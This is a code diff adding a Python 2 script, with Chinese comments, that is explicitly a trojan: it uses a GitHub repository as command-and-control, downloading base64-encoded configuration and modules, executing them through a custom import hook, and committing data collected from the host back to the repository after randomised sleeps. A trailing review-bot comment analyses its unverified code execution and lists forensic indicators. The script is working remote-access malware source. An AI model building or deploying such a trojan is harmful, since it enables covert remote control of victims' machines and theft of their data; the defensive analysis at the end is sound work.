|
| 1 | +#-*- coding:utf8 -*- |
| 2 | + |
| 3 | +import json |
| 4 | +import base64 |
| 5 | +import sys |
| 6 | +import time |
| 7 | +import imp |
| 8 | +import random |
| 9 | +import threading |
| 10 | +import Queue |
| 11 | +import os |
| 12 | + |
| 13 | +from github3 import login |
| 14 | + |
| 15 | +trojan_id = "abc" |
| 16 | + |
| 17 | +trojan_config = "%s.json" % trojan_id |
| 18 | +data_path = "chapter7/data/%s/" % trojan_id |
| 19 | +trojan_modules = [] |
| 20 | +configured = False |
| 21 | +task_queue = Queue.Queue() |
| 22 | + |
| 23 | + |
| 24 | +# 通过账号密码连接到github,获取repo和branch |
| 25 | +def connect_to_github(): |
| 26 | + gh = login(username="你的账号", password="你的密码") |
| 27 | + repo = gh.repository("你的账号,同上面的账号", "python-hacker-code(仓库名)") |
| 28 | + branch = repo.branch("master") |
| 29 | + |
| 30 | + return gh,repo,branch |
| 31 | + |
| 32 | +# 从远程仓库中获取文件 |
| 33 | +def get_file_contents(filepath): |
| 34 | + |
| 35 | + gh, repo, branch = connect_to_github() |
| 36 | + tree = branch.commit.commit.tree.recurse() |
| 37 | + |
| 38 | + for filename in tree.tree: |
| 39 | + |
| 40 | + if filepath in filename.path: |
| 41 | + print "[*] Found file %s" % filepath |
| 42 | + blob = repo.blob(filename._json_data['sha']) |
| 43 | + return blob.content |
| 44 | + |
| 45 | + return None |
| 46 | + |
| 47 | +# 获取木马的配置文件,并导入模块 |
| 48 | +def get_trojan_config(): |
| 49 | + global configured |
| 50 | + config_json = get_file_contents(trojan_config) |
| 51 | + config = json.loads(base64.b64decode(config_json)) |
| 52 | + configured = True |
| 53 | + |
| 54 | + for task in config: |
| 55 | + if task['module'] not in sys.modules: |
| 56 | + exec("import %s" % task['module']) |
| 57 | + |
| 58 | + return config |
| 59 | + |
| 60 | +# 将从目标主机收集到的数据推送到仓库中 |
| 61 | +def store_module_result(data): |
| 62 | + |
| 63 | + gh, repo, branch = connect_to_github() |
| 64 | + remote_path = "chapter7/data/%s/%d.data" % (trojan_id, random.randint(10,10000000)) |
| 65 | + repo.create_file(remote_path,"Commit message",base64.b64encode(data)) |
| 66 | + |
| 67 | + return |
| 68 | + |
| 69 | +def module_runner(module): |
| 70 | + |
| 71 | + # 将1加入到队列中 |
| 72 | + task_queue.put(1) |
| 73 | + result = sys.modules[module].run(a=1,b=2,c=3) |
| 74 | + # 从队列中移除 |
| 75 | + task_queue.get() |
| 76 | + |
| 77 | + # 保存结果到我们的仓库中 |
| 78 | + store_module_result(result) |
| 79 | + |
| 80 | + return |
| 81 | + |
| 82 | +class GitImporter(object): |
| 83 | + def __init__(self): |
| 84 | + self.current_module_code = "" |
| 85 | + |
| 86 | + # 尝试获取模块所在位置 |
| 87 | + def find_module(self, fullname, path=None): |
| 88 | + if configured: |
| 89 | + print "[*] Attempting to retrieve %s" % fullname |
| 90 | + new_library = get_file_contents("chapter7/modules/%s" % fullname) |
| 91 | + |
| 92 | + if new_library is not None: |
| 93 | + self.current_module_code = base64.b64decode(new_library) |
| 94 | + # 返回self变量,告诉python解析器找到了所需的模块 |
| 95 | + return self |
| 96 | + |
| 97 | + return None |
| 98 | + |
| 99 | + # 完成模块的实际加载过程 |
| 100 | + def load_module(self, name): |
| 101 | + # 创建一个空的模块对象 |
| 102 | + module = imp.new_module(name) |
| 103 | + # 将github中获得的代码导入的这个对象中 |
| 104 | + exec self.current_module_code in module.__dict__ |
| 105 | + # 最后将这个新建的模块添加到sys.modules列表里面 |
| 106 | + sys.modules[name] = module |
| 107 | + |
| 108 | + return module |
| 109 | + |
| 110 | + |
| 111 | + |
| 112 | +# 添加自定义的模块导入器 |
| 113 | +sys.meta_path = [GitImporter()] |
| 114 | +# 木马循环 |
| 115 | +while True: |
| 116 | + |
| 117 | + if task_queue.empty(): |
| 118 | + # 获取木马配置文件 |
| 119 | + config = get_trojan_config() |
| 120 | + for task in config: |
| 121 | + # 对每个模块单独建立线程 |
| 122 | + t = threading.Thread(target=module_runner, args=(task['module'],)) |
| 123 | + t.start() |
| 124 | + time.sleep(random.randint(1,10)) |
| 125 | + |
| 126 | + time.sleep(random.randint(1000,10000)) |
| 127 | + |
| 128 | + |
| 129 | + |
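Review bot: `get_trojan_config` feeds a field from the downloaded JSON into `exec("import %s" % task['module'])`, so that value is evaluated as source text rather than treated as a module name; `__import__(task['module'])` would go through the same `sys.meta_path` hook without evaluating a string. `GitImporter.load_module` then runs whatever bytes `get_file_contents` returned with no hash or signature check, and `get_file_contents` selects the file with `filepath in filename.path`, a substring test, so the first tree entry whose path merely contains the requested name is the one that gets executed. Anyone who can write to the repository, or who holds the account credentials written into `connect_to_github`, therefore controls what runs on the host. A comment at `load_module` such as `# executes repository content unverified: repo write access == code execution in this process` would make that trust boundary explicit. For someone examining a host where this ran, the visible behaviour is a Python 2 process (`print` statements, `Queue`, `imp`) that calls the GitHub API after randomised sleeps and commits `chapter7/data/<trojan_id>/<n>.data` files through `repo.create_file`.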